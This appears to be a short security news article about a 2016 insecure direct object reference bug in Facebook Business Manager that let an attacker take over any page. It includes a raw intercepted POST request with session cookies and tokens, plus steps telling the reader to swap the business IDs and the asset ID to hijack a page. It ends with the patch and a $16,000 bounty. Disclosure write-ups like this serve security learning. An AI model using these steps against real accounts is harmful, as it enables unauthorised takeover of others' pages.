Indian Security Researcher Arun Sureshkumar Found Facebook Vulnerability To Hack Any Facebook Page.
- He described the proof of concept of vulnerability in its blog
- It was the critical vulnerability, which allow to takeover any page with admin permission, that can perform critical actions like page deletion.
- He got $16000 Bug Bounty award from Facebook
Accoriding to Owasp, Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files.
Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system, and more. This is caused by the fact that the application takes user supplied input and uses it to retrieve an object without performing sufficient authorization checks.
1. Facebook Business Account (2 no’s).
One as own business and other can be any test account business.
Here i use my account business id as : 907970555981524
And another one , any partner id so i will choose it from my test account. 991079870975788
2. Add a partner using my own business and just intercept the request.
Now you can see the Vulnerable Request :
POST /business_share/asset_to_agency/?dpr=2 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Accept-Encoding: gzip, deflate, br
Cookie: rc=2; datr=AWE3V–DUGNTOAy0wTGmpAXb; locale=en_GB; sb=BWE3V1vCnlxJF87yY9a8WWjP; pl=n; lu=gh2GPBnmZY1B1j_7J0Zi3nAA; c_user=100000771680694; xs=25%3A5C6rNSCaCX92MA%3A2%3A1472402327%3A4837; fr=05UM8RW0tTkDVgbSW.AWUB4pn0DvP1fQoqywWeORlj_LE.BXN2EF.IL.FfD.0.0.BXxBSo.AWXdKm2I; csm=2; s=Aa50vjfSfyFHHmC1.BXwxOY; _ga=GA1.2.1773948073.1464668667; p=-2; presence=EDvF3EtimeF1472469215EuserFA21B00771680694A2EstateFDutF1472469215051CEchFDp_5f1B00771680694F7CC; act=1472469233458%2F6
parent_business_id=907970555981524&agency_id=991079870975788&asset_id=536195393199075&role=MANAGER&__user=100000771680694&__a=1&__dyn=aKU-XxaAcoaucCJDzopz8aWKFbGEW8UhrWqw-xG2G4aK2i8zFE8oqCwkoSEvmbgcFV8SmqVUzxeUW4ohAxWdwSDBzovU-eBCy8b48xicx2aGewzwEx2qEN4yECcKbBy9onwFwHCBxungXKdAw&__req=e&__be=-1&__pc=PHASED%3Abrands_pkg&fb_dtsg=AQHoLGh1HUmf%3AAQGT4fDF1-nQ&ttstamp=265817211176711044972851091025865817184521026870494511081&__rev=25307333. Change asset id to the page you want to hack. and also interchange the parent_business_id with agency_id.
4. Resend the request.
Request send successfully. Page added to the Facebook Business Manager of the attacker with permission role Manager.
5. Assigned me as the admin of the page, which was added by the exploit.
6. Browse the page using the Facebook.
Arun reported on 29 Aug 2016 to Facebook security team and Facebook patched the vulnerability on 6th September. On 16 September, Facebook security team rewarded of $16000 USD as a part of bug bounty program.